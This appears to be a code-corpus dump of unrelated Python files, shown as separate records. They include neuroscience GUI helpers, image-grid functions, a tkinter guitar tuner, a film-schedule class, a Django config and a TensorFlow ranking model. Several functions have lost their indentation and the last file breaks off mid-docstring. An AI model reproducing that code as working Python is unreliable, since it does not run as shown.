    # retrieves the rotation filter data class object
    r_obj = RotationFilteredData(data, rot_filt, None, None, True, 'Whole Experiment', False,
                                 rmv_empty=0, use_raw=True)

    # returns the cluster indices
    return r_obj.clust_ind
def get_unique_group_types(d_clust, f_type, wfm_para=None, c_type=None):
    '''
    Retrieves the unique values present for a given filter field type.

    :param d_clust: list of experiment cluster dicts
    :param f_type: filter field type string
    :param wfm_para: waveform parameters (selects the uniform-drifting branch)
    :param c_type: freely moving cell type tables (selects the cell-type branch)
    :return: list of unique value strings
             NOTE(review): None is returned implicitly when f_type matches no
             branch - confirm callers tolerate this
    '''

    # retrieves the field values based on the type and inputs
    if wfm_para is not None:
        # case is the uniform-drifting values
        if f_type == 'temp_freq':
            return [str(x) for x in get_field(wfm_para, 'tFreq')]
        elif f_type == 'temp_freq_dir':
            return [str(x) for x in get_field(wfm_para, 'yDir').astype(int)]
        elif f_type == 'temp_cycle':
            return [str(x) for x in get_field(wfm_para, 'tCycle').astype(int)]

    elif c_type is not None:
        if f_type in ['c_type', 'free_ctype']:
            # concatenates the non-empty cell type tables; 'No Type' is added
            # when any cell carries no type flag at all
            c_type0 = pd.concat([x[0] for x in c_type if len(x)], axis=0)
            c_none = ['No Type'] if any(np.sum(c_type0, axis=1)==0) else []
            return [ct for ct, ct_any in zip(c_type0.columns, np.any(c_type0, axis=0)) if ct_any] + c_none

    else:
        if f_type == 'sig_type':
            return ['Narrow Spikes', 'Wide Spikes']
        elif f_type == 'match_type':
            return ['Matched Clusters', 'Unmatched Clusters']
        elif f_type in ['t_type', 'trial_type']:
            return flat_list([list(x['rotInfo']['trial_type']) for x in d_clust])
        elif f_type in ['region_type', 'region_name']:
            return list(np.unique(flat_list([list(np.unique(x['chRegion'])) for x in d_clust])))
        elif f_type == 'record_layer':
            return list(np.unique(flat_list([list(np.unique(x['chLayer'])) for x in d_clust])))
        elif f_type == 'record_coord':
            return list(np.unique([x['expInfo']['record_coord'] for x in d_clust]))
        elif f_type in ['lesion_type', 'lesion']:
            return list(np.unique([x['expInfo']['lesion'] for x in d_clust]))
        elif f_type == 'record_state':
            return list(np.unique([x['expInfo']['record_state'] for x in d_clust]))
def get_free_inclusion_indices(data, i_bin, rmv_nmatch=False):
    '''
    Builds cell inclusion flags for the external freely-moving data files.

    :param data: main data object
    :param i_bin: bin index selecting the cell-type table column set
    :param rmv_nmatch: if True, cells without a fixed-preparation match are
                       also excluded
    :return: object array of per-file boolean inclusion flag arrays
    '''

    # function import
    from analysis_guis.calc_functions import get_inclusion_filt_indices

    # initialisations
    f_data, g_filt = data.externd.free_data, data.exc_gen_filt
    cell_type_all, ahv_score_all = f_data.cell_type, f_data.ahv_score

    # retrieves the indices of the free experiments that match the external data files
    c_free = [c for c in data._cluster if c['rotInfo'] is None]
    exp_free = [extract_file_name(x['expFile']) for x in c_free]
    i_expt_free = [exp_free.index(det_closest_file_match(exp_free, f_name)[0]) for f_name in f_data.exp_name]

    # retrieves the inclusion cell boolean flags (matched with the external data files)
    cl_inc_free = [get_inclusion_filt_indices(c_free[i_ex], g_filt) for i_ex in i_expt_free]

    # maps the freely moving experiments to the external data files
    # (note: the loop variable 'id' shadows the builtin of the same name)
    i_map = [np.intersect1d(id, c['clustID'], return_indices=True)[1:]
                    for id, c in zip(f_data.cell_id, np.array(c_free)[i_expt_free])]

    # matches up the inclusion flags for the external data files to the matching free data files
    cl_inc_extn = np.empty(len(c_free), dtype=object)
    n_ff = [np.size(c_type[i_bin], axis=0) for c_type in cell_type_all]
    for i in range(len(c_free)):
        cl_inc_extn[i] = np.zeros(n_ff[i], dtype=bool)
        cl_inc_extn[i][i_map[i][0]] = cl_inc_free[i][i_map[i][1]]

    # resets the inclusion cell boolean flags (if required)
    if rmv_nmatch:
        # determines the mapping between the free/external data file free cells
        _, f2f_map = det_matching_fix_free_cells(data, exp_name=f_data.exp_name)

        # sets the inclusion cell boolean flags for the unmatched cells to false
        for i in range(len(cl_inc_extn)):
            cl_inc_extn[i][~set_binary_groups(n_ff[i], f2f_map[i][f2f_map[i][:, 1] >= 0, 1])] = False

    # returns the inclusion index array
    return cl_inc_extn
def get_cell_index_and_id(h_main, cell_id, exp_name, use_raw=False, arr_out=True, plot_all=False):
    '''
    Resolves GUI cell ID strings into cluster ID#'s and in-experiment indices.

    :param h_main: main GUI object (supplies function data and clusters)
    :param cell_id: cell ID string of the form '...#<id>' (or list thereof)
    :param exp_name: name of the experiment the cells belong to
    :param use_raw: select the raw (True) or filtered (False) cluster list
    :param arr_out: return lists (True) or just the first id/index (False)
    :param plot_all: if True, returns all cluster IDs/indices for the experiment
    :return: (cluster ID values, cell indices) as lists or single values
    '''

    # retrieves the experiment index and cluster ID#'s
    i_expt = h_main.fcn_data.get_exp_name_list('Experiments').index(exp_name)
    cl_id = h_main.data._cluster[i_expt]['clustID'] if use_raw else h_main.data.cluster[i_expt]['clustID']

    # when plotting everything, every cluster in the experiment is returned
    if plot_all:
        return cl_id, list(np.arange(len(cl_id)).astype(int))

    # converts the cell ID integers to a list (if not already so)
    if not isinstance(cell_id, list):
        cell_id = [cell_id]

    # determines the cell ID# and index within the experiment for each cell ID#
    c_id, i_cell = [], []
    for _cid in cell_id:
        # retrieves the cell ID# from the current cell (text after the '#')
        c_id_nw = int(_cid[_cid.index('#') + 1:])
        c_id.append(c_id_nw)

        # determines the index of the cell within the experiment
        i_cell.append(cl_id.index(c_id_nw))

    # returns the cell ID/index arrays
    if arr_out:
        # case is outputting the values as an array
        return c_id, i_cell
    else:
        # case is outputting individual values
        return c_id[0], i_cell[0]
def get_fix_free_indices(data, data_fix, data_free, cell_id, use_1D=False):
    '''
    Resolves combined "fix/free" cell ID strings into ID and index arrays.

    :param data: main data object (unused here but kept for the interface)
    :param data_fix: fixed-preparation cluster dict
    :param data_free: freely-moving cluster dict
    :param cell_id: list of cell ID strings, each embedding two integers
                    (fixed ID first, free ID second)
    :param use_1D: if True, only the first cell's 1D arrays are returned
    :return: (c_id, i_cell) integer arrays of shape (n_cell, 2), or the first
             row of each when use_1D; (None, None) after an on-screen error
    '''

    if (len(cell_id) == 0) or (cell_id[0] == 'No Valid Fixed/Free Cells'):
        # if there are no valid cells, or no cells were selected, then output an error to screen
        e_str = 'Either there are no valid cells for this experiment or no cells have been selected.\n' \
                'Re-run the function with either another experiment or with cells selected.'
        show_error(e_str, 'Invalid Fixed/Free Cell Selection')

        # if there are no cells selected, then return None
        return None, None

    # determines the number of cells that are to be analysed
    n_cell = len(cell_id)
    if n_cell > n_plot_max:
        # if the number of cell is greater than max, then set the error string
        e_str = 'The number of subplots ({0}) is greater than the maximum ({1}).\nRemove the "Plot All Clusters" ' \
                'checkbox option before re-running this function.'.format(n_cell, n_plot_max)

        # output an error message to screen and return Nones
        show_error(e_str, 'Invalid Cell Selection')
        return None, None

    else:
        # memory allocation (-1 marks unset entries)
        c_id, i_cell = -np.ones((n_cell, 2), dtype=int), -np.ones((n_cell, 2), dtype=int)

        for ic, cc in enumerate(cell_id):
            # splits the cell ID into fixed/free cell IDs
            i_ff = re.findall('[0-9]+', cc)

            # determines the cluster index/cell index for each grouping
            for j in range(len(i_ff)):
                c_id[ic, j] = int(i_ff[j])
                i_cell[ic, j] = data_fix['clustID'].index(c_id[ic, j]) if j == 0 else \
                                data_free['clustID'].index(c_id[ic, j])

        # returns the arrays
        if use_1D:
            # returns the 1D array if required
            return c_id[0, :], i_cell[0, :]
        else:
            # otherwise, return the full arrays
            return c_id, i_cell
def get_all_fix_free_indices(data, c_data, data_fix, data_free, match_reqd=False, is_old=False):
    '''
    Determines the fixed/free cell ID and index arrays for all included cells.

    :param data: main data object (supplies the general exclusion filter)
    :param c_data: comparison dataset object (supplies the match indices)
    :param data_fix: fixed-preparation cluster dict
    :param data_free: freely-moving cluster dict
    :param match_reqd: if True, only cells with an accepted match are kept
    :param is_old: use the old (True) or current (False) match index array
    :return: (c_id, i_cell) integer arrays of shape (n_kept, 2), where -1 in
             column 1 marks a missing free match; (None, None) after an
             on-screen error
    '''

    # function import
    from analysis_guis.calc_functions import get_inclusion_filt_indices

    # initialisations
    e_str = None

    # retrieves the inclusion filter indices and the fix/free cell ID#'s
    cl_ind = get_inclusion_filt_indices(data_fix, data.exc_gen_filt)
    cl_fix, cl_free = np.array(data_fix['clustID']), np.array(data_free['clustID'])

    # sets the match indices (depending on the calculation method)
    # NOTE(review): i_match aliases the array stored on c_data, so the
    # assignment below mutates c_data's match data in place - confirm intended
    i_match = c_data.i_match_old if is_old else c_data.i_match
    if match_reqd:
        # if a match is required, then remove all non-matches
        i_match[~cl_ind] = -1
        ii = i_match >= 0
    else:
        # otherwise, use the inclusion filter flags directly
        ii = cl_ind

    if np.any(ii):
        # determines the number of cells that are to be analysed
        if np.sum(ii) > n_plot_max:
            # if the number of cell is greater than max, then set the error string
            e_str = 'The number of subplots ({0}) is greater than the maximum ({1}).\nRemove the "Plot All Clusters" ' \
                    'checkbox option before re-running this function.'.format(np.sum(ii), n_plot_max)
        else:
            # memory allocation (-1 marks unset/missing entries)
            n_cell = len(ii)
            c_id, i_cell = -np.ones((n_cell, 2), dtype=int), -np.ones((n_cell, 2), dtype=int)

            # sets the cell ID#'s and indices
            for i_m in np.where(ii)[0]:
                # sets the fixed cell ID#/index
                c_id[i_m, 0], i_cell[i_m, 0] = cl_fix[i_m], i_m
                if i_match[i_m] >= 0:
                    # if there is a match, then set the free cell ID#/index
                    c_id[i_m, 1], i_cell[i_m, 1] = cl_free[i_match[i_m]], i_match[i_m]

            # removes the rows of cells that were not included
            c_id, i_cell = c_id[ii, :], i_cell[ii, :]
    else:
        # if there are no valid cells, then set the error string
        e_str = 'There are no valid fixed/free cell matches! Either select another function or reset ' \
                'the filter options.'

    if e_str is None:
        # if there was no errors, then return the arrays
        return c_id, i_cell
    else:
        # if there was an error, then output the error message to screen and return Nones
        show_error(e_str, 'Invalid Cell Selection')
        return None, None
def is_final_row(i_row, i_col, n_row, n_col, n_plot):
    '''
    Determines if (i_row, i_col) lies on the last occupied row of its column
    within an n_row x n_col subplot grid holding n_plot plots.

    :param i_row: zero-based row index
    :param i_col: zero-based column index
    :param n_row: total number of grid rows
    :param n_col: total number of grid columns
    :param n_plot: total number of plots placed in the grid
    :return: True when the cell is on the final occupied row of its column
    '''

    # columns to the right of the partially-filled final row end one row early
    # NOTE(review): when n_plot is an exact multiple of n_col the remainder is
    # zero, so every column is treated as ending at n_row - 1 - confirm intended
    ends_early = (i_col + 1) > (n_plot % n_col)
    last_row = n_row - (1 if ends_early else 0)
    return (i_row + 1) == last_row
def get_scatterplot_colour(c, x):
    '''
    Expands a scatterplot colour specification to match the plotted points.

    :param c: colour string, or a colour array for a single point
    :param x: sequence of values being plotted
    :return: the colour string unchanged, or the colour array tiled once per
             plotted element
    '''

    if not isinstance(c, str):
        # colour is an array, so repeat it for every element being plotted
        return repmat(c, len(x), 1)

    # colour is a plain string and applies to all points as-is
    return c
983,719 | 731aabab1559e0ef2c9cfbb8c46adf707c643287 | import math
import random
import numpy as np
def crop_region(full_image, bbox):
    """Return the sub-image of full_image covered by bbox = (x, y, w, h)."""
    x0, y0, width, height = bbox
    return full_image[y0:y0 + height, x0:x0 + width]
def distance(rgb1, rgb2):
    """
    Return the Euclidean distance between the two RGB colors
    """
    delta = np.asarray(rgb1) - np.asarray(rgb2)
    return math.sqrt(np.sum(delta ** 2))
def _create_grid(images, indices, n_rows=4, n_cols=4):
n, h, w, *rest = images.shape
c = rest[0] if rest else 1
# Grayscale and RGB need differing grid dimensions
if c > 1:
display_grid = np.zeros((n_rows * h, n_cols * w, c))
else:
display_grid = np.zeros((n_rows * h, n_cols * w))
# Uncomment the line below if you want to visualize
# digit data with smooth contours.
# display_grid = display_grid.astype(np.uint8)
row_col_pairs = [(row, col) for row in range(n_rows) for col in range(n_cols)]
for idx, (row, col) in zip(indices, row_col_pairs):
row_start = row * h
row_end = (row + 1) * h
col_start = col * w
col_end = (col + 1) * w
if c > 1:
display_grid[row_start:row_end, col_start:col_end, :] = images[idx]
else:
display_grid[row_start:row_end, col_start:col_end] = images[idx].reshape((h,w))
return display_grid
def create_grid(images, n_rows=4, n_cols=4):
    """
    Build an n_rows x n_cols grid from the first K images, where
    K = n_rows * n_cols capped at the number of available images.
    The grid itself is one large NumPy array.
    """
    n_shown = min(n_rows * n_cols, len(images))
    return _create_grid(images, list(range(n_shown)), n_rows, n_cols)
def create_rand_grid(images, n_rows=4, n_cols=4):
    """
    Build an n_rows x n_cols grid from K randomly chosen images, where
    K = n_rows * n_cols capped at the number of available images.
    The grid itself is one large NumPy array.
    """
    n_shown = min(n_rows * n_cols, len(images))
    chosen = random.sample(range(len(images)), n_shown)
    return _create_grid(images, chosen, n_rows, n_cols)
def get_result():
    """
    Read the target key from the E1 entry widget, measure the frequency of
    the plucked string via guitar_tuning() and report tuning advice
    (Tighten!/Loosen!/Just Right!) in the listbox.
    """
    from guitar_tune import guitar_tuning
    global E1, listbox, Tk

    # target fundamental frequencies (Hz) for standard guitar tuning
    note_freq = {
        'E_low': 82.41,
        'A': 110.00,
        'D': 146.83,
        'G': 196.00,
        'B': 246.94,
        'E_high': 329.63,
    }

    key = E1.get()
    if key not in note_freq:
        output = 'Invalid Entry, Please enter again.'
    else:
        freq = note_freq[key]

        # measures the frequency of the plucked string
        sample_freq = guitar_tuning()

        # the second window accepts the first harmonic (twice the fundamental)
        if abs(sample_freq - freq) < 4 or abs(sample_freq - 2 * freq) < 8:
            output = "Just Right!"
        elif sample_freq > freq:
            # the plain else guarantees output is always assigned; the
            # original left it unbound (NameError) when the difference was
            # exactly +/-4 Hz
            output = "Loosen!"
        else:
            output = "Tighten!"

    listbox.insert(Tk.END, output)
def guitar_tuning_gui():
    """
    Build and run the tuner GUI: an entry for the target key, a Result
    button that triggers get_result() and a listbox showing the advice.
    """
    # the global declaration must precede the 'import ... as Tk' binding;
    # Python 3 raises "SyntaxError: name 'Tk' is assigned to before global
    # declaration" with the original statement order
    global E1, listbox, Tk
    import tkinter as Tk

    root = Tk.Tk()

    # Define widgets (E1 and listbox are shared with get_result via globals)
    listbox = Tk.Listbox(root)
    L1 = Tk.Label(root, text = 'Enter Target Key (E_low,E_high,A,D,G,B)')
    E1 = Tk.Entry(root)
    B1 = Tk.Button(root, text = 'Result', command = get_result)

    L1.pack()
    E1.pack()
    B1.pack()
    listbox.pack()
    root.mainloop()
983,721 | 42cbd466c652e67ab0e5a1919257b04b8143b695 | # -*- coding: utf-8 -*-
# Copyright (c) 20014 Patricio Moracho <pmoracho@gmail.com>
#
# Combinacion.py
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 3 of the GNU General Public License
# as published by the Free Software Foundation. A copy of this license should
# be included in the file GPL-3.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
__author__ = "Patricio Moracho (pmoracho@gmail.com)"
__version__ = "Revision: 1.1"
__date__ = "2014/06/24 13:42:03"
import datetime
from Object import Object
from Hitos import Hitos
#################################################################################################################################################
## Combinacion
#################################################################################################################################################
class Combinacion(Object):
"""
Clase para el manejo de una combinacion de Hitos / Proyecciones
"""
numero = 1
    def __init__(self, distancias, horadesde="", horahasta=""):
        """Create a combination covering the given distances and time window.

        :param distancias: distance/travel data handed through to Hitos
                           (presumably travel times between venues - confirm)
        :param horadesde: earliest time of day to take part (empty = no limit)
        :param horahasta: latest time of day to take part (empty = no limit)
        """
        Object.__init__(self)
        self.hitos = Hitos(distancias, horadesde, horahasta)  # milestone container
        self.horadesde = horadesde
        self.horahasta = horahasta
        self.descripcion = ""
        self.distancias = distancias
        # sequential id taken from (and advancing) the class-level counter
        self.numero = Combinacion.numero
        Combinacion.numero = Combinacion.numero + 1
def __repr__(self):
"""Class representation"""
return self.__str__()
def __str__(self):
"""String representation"""
return '[%s: (%d), %d, %s, %s, %s, %s]' % (self.__class__.__name__, self.id, self.numero, self.horadesde, self.horahasta, self.descripcion, Combinacion.__get_nice_string(self.hitos))
def __get_nice_string(list):
return "[" + ", ".join(str(item) for item in list) + "]"
def __len__(self):
"""Len of the list container"""
return len(self.hitos)
def __iter__(self):
return iter(self.hitos)
def reset_numero(self):
Combinacion.numero = 0
def addhito(self, hito):
self.hitos.add(hito)
self.hitos.sort()
def validhito(self, hito):
"""
Valida un hito con relación al resto del histos en la combinación
"""
if not self.hitos: # No hay ningún hito en la lista
if not self.validtimefilter(hito):
return False
elif hito in self.hitos: # El hito ya se enuentra en la lista
return False
elif self.existtema(hito): # El tema del hito ya se existe en la lista
return False
elif not self.validtimefilter(hito): # El hito está dentro de las horas en que se quiere participar del evento
return False
elif not self.validtimecombination(hito): # El hito es posible de cumplir en función de los horarios y trayectos del resto de los hitos
return False
elif not self.validcambiosbarrio(hito): # TODO: Cuantos cambios de barrio queremos hacer?
return False
elif not self.validcantidadhitosmax(hito): # TODO: Cuantas películas por día
return False
return True
def hitosdiferentes(self, combinacion):
return list(set(self.hitos) - set(combinacion.hitos))
def existtema(self, hito):
"""
Existe el tema en la lista de hitos?
"""
for h in self.hitos:
if hito.tema == h.tema:
return True
return False
def validcambiosbarrio(self, hito):
"""
Retorna verdader/falso si el hito no supera la cantidad de cambios de barrio/sedes solicitado
"""
return True
def validcantidadhitosmax(self, hito):
"""
Retorna verdader/falso si el hito supera la cantidad de peliculas máxima por día solicitada
"""
return True
def validtimefilter(self, hito):
"""
Retorna verdader/falso si el hito entra dentro del desde/hasta hora deseado
"""
if self.horadesde == "" and self.horahasta == "":
return True
else:
hora = hito.fechahora[hito.fechahora.index(" / ")+3:]
hora_hito = datetime.datetime.strptime(hora, "%H:%M")
if self.horadesde != "":
if self.isPrimerHitoDelDia(hito):
hora_desde = datetime.datetime.strptime(self.horadesde, "%H:%M")
if hora_desde > hora_hito:
return False
if self.horahasta != "":
if self.isUltimoHitoDelDia(hito):
hora_hasta = datetime.datetime.strptime(self.horahasta, "%H:%M")
#print("%s --- %s = %s --- %s" % (self.horahasta,str(hora_hasta),hora_hito, str(hora_hito)))
if hora_hasta < hora_hito:
return False
return True
def validtimecombination(self, hito):
"""
Valida si se puede insertar el hito en la combinación
"""
for i in range(-1, len(self.hitos)):
if i == -1:
inicial = None
final = self.hitos[i+1]
elif i == len(self.hitos)-1:
inicial = self.hitos[i]
final = None
else:
inicial = self.hitos[i]
final = self.hitos[i+1]
if self.validbetween(hito, inicial, final):
return True
return False
def getDate(self, fechahora):
#print("*%s*" % fechahora[0:fechahora.index(" / ")])
return fechahora[0:fechahora.index(" / ")]
def getTime(self, fechahora):
#print("*%s*" % fechahora[fechahora.index(" / ")+3:])
return fechahora[fechahora.index(" / ")+3:]
def isPrimerHitoDelDia(self, h):
for hito in self.hitos:
day_hito = self.getDate(hito.fechahora)
day_h = self.getDate(h.fechahora)
if day_hito == day_h:
if h.inicio < hito.inicio:
return True
else:
return False
return True
def isUltimoHitoDelDia(self, h):
for hito in self.hitos:
day_hito = self.getDate(hito.fechahora)
day_h = self.getDate(h.fechahora)
if day_hito == day_h:
if h.inicio > hito.inicio:
return True
else:
return False
return True
def validbetween(self, hito, inicial, final):
if inicial is None:
if ((hito.inicio + hito.tema.duracion + self.distanciabetween(hito, final)) < final.inicio):
return True
elif final is None:
if (hito.inicio > (inicial.inicio + inicial.tema.duracion+self.distanciabetween(hito, inicial))):
return True
else:
if ((hito.inicio + hito.tema.duracion + self.distanciabetween(hito, final)) < final.inicio) and \
(hito.inicio > (inicial.inicio + inicial.tema.duracion + self.distanciabetween(inicial, hito))):
return True
return False
def distanciabetween(self, origen, destino):
return self.distancias.between(origen.ubicacion, destino.ubicacion)
def report(self):
print("")
print("Combinación (%d) %d" % (self.id, self.numero))
print("")
self.hitos.report()
print()
def get_html(self, max=None):
return self.hitos.get_htmltable()
|
983,722 | 1986aa4e9d518fa7c6bcfa905e9ad2cda6e140e8 | from django.apps import AppConfig
class SdcConfig(AppConfig):
    """Django application configuration for the ``sdc`` app."""
    # Dotted module path Django uses to register the application.
    name = 'sdc'
|
983,723 | 6006dce2ba692532f614d2cffe014919017e75ff | grade = 95
if grade > 90 :
print("You got A")
elif grade > 80 :
print("you got B")
elif grade > 70 :
print("C")
else :
print("You are a total failure")
if grade > 90 :
print("Your grade is A")
if not(grade > 90) and (grade > 80) :
print("Your grade is B")
|
983,724 | f4ae8eca8e09acd7fbc8c2137db1ae51479141a3 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 2 15:42:08 2020
@author: ehsan.mousavi
"""
import pandas as pd
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
#ModelType.DRM_MODEL = "DRM"
from datetime import datetime
def get_dt_str():
    """Return the current local time formatted like 'Jun 24 2014 13:42:03'.

    Replaces the former ``lambda`` assignment with a named ``def`` (PEP 8);
    the callable's name and zero-argument signature are unchanged.
    """
    return datetime.now().strftime("%b %d %Y %H:%M:%S")
class BaseModel:
    """Minimal common base class for the model implementations below."""

    def __init__(self):
        """No shared state to initialize; subclasses set their own."""
        pass
class MULTI_DRM_Gradient(BaseModel):
    """Direct Ranking Model using Gradient Descent.

    NOTE(review): built on TensorFlow 1.x APIs (tf.placeholder, tf.contrib,
    tf.Session) — this class does not run on TF 2.x without tf.compat.v1.
    """
    #model_type = ModelType.DRM_MODEL
    def __init__(self,
                 number_structures,
                 keep_prob = .5,
                 dim_inputs=None,
                 dim_hidden_lst=[],
                 obj_rule='cpiv',
                 shadow=None,
                 est_individual=False,
                 learning_rate=1e-1,
                 reg_scale=1e-1, reg_type='L2', epochs=100, target_loss=None, print_every=10,
                 verbose=True, plot_losses=False, random_seed=None,
                 standardization_input=True,**kwargs):
        """
        Set hyper-parameters and construct computation graph.
        :param number_structures: number of different structures (including the control)
        :param keep_prob: keep probability in drop-out regularization
        :param dim_inputs: input feature dimensions, if None, then this value will be inferred during fit
        :param dim_hidden_lst: number of neurons for hidden layers ([] means linear model)
        :param obj_rule: objective to optimize during training, could be cpiv (inc cost per inc value),
        lagrangian (lambda expression), value, cost (maximize delta values) or ivc (inc value per inc cost)
        :param est_individual: if True, then estimate the individual incremental value or cost, which depends on
        parameter obj_rule (only for value or cost)
        :param shadow: shadow price (lambda) for Lagrange objective, if None, use CPIT
        :param learning_rate: learning rate for gradient descent
        :param reg_scale: regularization factor
        :param reg_type: type of regularization, 'L1' or 'L2'
        :param epochs: number of epochs for training
        :param target_loss: target loss for training
        :param print_every: print every n training epochs
        :param verbose: if verbose during training
        :param plot_losses: if plot losses during training
        :param random_seed: random seed used to control the graph, if None then not control for random seed
        :param standardization_input: transfer the input to mean zero variance 1
        """
        # super(MULTI_DRM_Gradient, self).__init__()
        # NOTE(review): unconditionally overrides the caller's plot_losses
        # argument — confirm this debug override is intentional.
        plot_losses = True
        self.number_structures = number_structures
        self.keep_prob = keep_prob
        self.dim_inputs = dim_inputs
        # NOTE(review): dim_hidden_lst=[] is a mutable default argument; it
        # is not mutated here, but a None default would be safer.
        self.dim_hidden_lst = dim_hidden_lst
        self.obj_rule = obj_rule
        self.est_individual = est_individual
        self.shadow = shadow
        self.learning_rate = learning_rate
        self.reg_scale = reg_scale
        self.reg_type = reg_type
        self.epochs = epochs
        self.target_loss = target_loss
        self.print_every = print_every
        self.verbose = verbose
        self.plot_losses = plot_losses
        self.random_seed = random_seed
        self.standardization_input = standardization_input
        # non-initialized session
        self.sess = None
        self.scaler = None
        # build graph here if dim_inputs is passed
        if self.dim_inputs is not None:
            self._build_graph()
        # dictionary hold training statistics
        self.train_stats = {}

    def get_params(self):
        """
        :return: dictionary of hyper-parameters of the model.

        NOTE(review): number_structures, keep_prob and standardization_input
        are not included, so load() cannot fully reconstruct the model from
        this dict — verify before relying on save/load round-trips.
        """
        return {
            'dim_inputs': self.dim_inputs,
            'dim_hidden_lst': self.dim_hidden_lst,
            'obj_rule': self.obj_rule,
            'shadow': self.shadow,
            'est_individual': self.est_individual,
            'learning_rate': self.learning_rate,
            'reg_scale': self.reg_scale,
            'reg_type': self.reg_type,
            'epochs': self.epochs,
            'target_loss': self.target_loss,
            'print_every': self.print_every,
            'verbose': self.verbose,
            'plot_losses': self.plot_losses,
            'random_seed': self.random_seed,
        }

    def _create_placeholders(self):
        """Create placeholders for input data."""
        with tf.name_scope("data"):
            self.X = tf.placeholder(tf.float32, shape=[None, self.dim_inputs], name='X')
            self.value = tf.placeholder(tf.float32, shape=[None], name='value')
            self.cost = tf.placeholder(tf.float32, shape=[None], name='cost')
            # self.sample_weight = tf.placeholder(tf.float32, shape=[None, 1], name='sample_weight')
            self.cohort_weight = tf.placeholder(tf.float32, shape=[None, self.number_structures], name='cohort_weight')
            self.control_value = tf.placeholder(tf.float32, shape=[1], name='control_value')
            self.control_cost = tf.placeholder(tf.float32, shape=[1], name='control_cost')

    def _create_variables(self):
        """Create variables for the model (one weight matrix per layer)."""
        with tf.name_scope("variable"):
            if self.reg_type == 'L2':
                regularizer = tf.contrib.layers.l2_regularizer(scale=self.reg_scale)
            else:
                regularizer = tf.contrib.layers.l1_regularizer(scale=self.reg_scale)
            # Layer sizes: inputs -> hidden layers -> one logit per structure.
            self.dim_lst = [self.dim_inputs] + self.dim_hidden_lst + [self.number_structures]
            # NOTE(review): debug print left in library code.
            print(self.dim_lst)
            self.W_lst = []
            self.b_lst = []
            for i in range(len(self.dim_lst)-1):
                self.W_lst.append(tf.get_variable(
                    "W{}".format(i+1),
                    shape=[self.dim_lst[i], self.dim_lst[i+1]],
                    initializer=tf.contrib.layers.xavier_initializer(),
                    regularizer=regularizer)
                )
                # not output layer, has bias term
                if i < len(self.dim_lst) - 2:
                    self.b_lst.append(tf.get_variable("b{}".format(i+1), shape=[self.dim_lst[i+1]]))

    def _create_prediction(self):
        """Create model predictions (softmax score over structures)."""
        epsilon = 1e-3
        with tf.name_scope("prediction"):
            h = self.X
            for i in range(len(self.dim_lst) - 1):
                # not output layer, has bias term
                if i < len(self.dim_lst) - 2:
                    h = tf.matmul(h, self.W_lst[i]) + self.b_lst[i]
                    h = tf.nn.relu(h)
                    h = tf.nn.dropout(h, keep_prob=self.keep_prob)
                # output layer
                else:
                    h = tf.matmul(h, self.W_lst[i])
                    # batch_mean, batch_var = tf.nn.moments(h,[0])
                    # scale = tf.Variable(tf.ones([self.dim_lst[-1]]))
                    # beta = tf.Variable(tf.zeros([self.dim_lst[-1]]]))
                    # BN = tf.nn.batch_normalization(h,
                    #                                batch_mean,
                    #                                batch_var,
                    #                                beta,
                    #                                scale,
                    #                                epsilon)
                    # h = tf.nn.softmax(BN)
                    # h = tf.nn.softmax(20*tf.nn.tanh(h))
                    # Temperature factor 20 sharpens the softmax output.
                    h = tf.nn.softmax(20*h)
            self.score = h

    def _create_loss(self):
        """Create loss based on true label and predictions."""
        with tf.name_scope("loss"):
            # gini=(tf.nn.l2_loss( self.score))/100000
            # NOTE(review): tf.losses.softmax_cross_entropy expects
            # (onehot_labels, logits); here the score is passed as labels and
            # zeros as logits — confirm this entropy-style penalty is intended.
            gini = tf.losses.softmax_cross_entropy(self.score, 0*self.score)
            promo_prob=tf.reduce_sum(tf.multiply(self.score, self.cohort_weight),
                                     axis=1)
            inc_value = tf.reduce_mean(tf.multiply(promo_prob, self.value))- self.control_value
            inc_cost = tf.reduce_mean( tf.multiply(promo_prob, self.cost)) - self.control_cost
            # determine loss function based on self.obj_rule
            if self.obj_rule == 'cpiv':
                self.objective = inc_cost / inc_value
            elif self.obj_rule == 'ivc':
                # maximize ivc
                self.objective = - inc_value / inc_cost
            elif self.obj_rule == 'lagrangian':
                assert self.shadow is not None, 'Need to pass in shadow value if use lagrangian as obj_rule.'
                self.objective = inc_cost - self.shadow * inc_value
            elif self.obj_rule == 'value':
                # maximize delta values
                self.objective = - inc_value
            # use only cost as objective
            elif self.obj_rule == 'cost':
                # maximize delta cost
                self.objective = - inc_cost
            else:
                raise Exception('Invalid obj_rule!')
            # regularization
            reg_loss = tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))
            # weights = tf.trainable_variables() # all vars of your graph
            # reg_loss = tf.norm( weights,ord=1)
            # final loss
            self.loss = self.objective +reg_loss+.1*gini

    def _create_optimizer(self):
        """Create optimizer to optimize loss."""
        with tf.name_scope("optimizer"):
            self.train_step = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)

    def _build_graph(self):
        """Build the computation graph and open a session bound to it."""
        self.graph = tf.Graph()
        # set self.graph as default graph
        with self.graph.as_default():
            # # clear old variables
            # tf.reset_default_graph()
            # set random seed
            if self.random_seed is not None:
                tf.set_random_seed(self.random_seed)
            self._create_placeholders()
            self._create_variables()
            self._create_prediction()
            self._create_loss()
            self._create_optimizer()
            self._init = tf.global_variables_initializer()
            self.saver = tf.train.Saver()
        # create session
        self.sess = tf.Session(graph=self.graph)

    @staticmethod
    def _calculate_avg_inc_value_cost(y):
        """
        Calculate average incremental values and cost
        :param y: numpy array, [value, cost, is_treatment]
        :return: numpy array with 2 number, [avg inc value, avg inc cost]

        NOTE(review): fit() asserts y has exactly 2 columns but this helper
        reads y[:, -1] as a treatment flag (3 columns) — the two are
        inconsistent; verify the expected shape of y.
        """
        is_treatment = y[:, -1].astype(bool)
        y_t = y[is_treatment, :2]
        y_c = y[~is_treatment, :2]
        return np.mean(y_t, axis=0) - np.mean(y_c, axis=0)

    def save(self, path=None, spark=None):
        """
        Derived from BaseModel class.
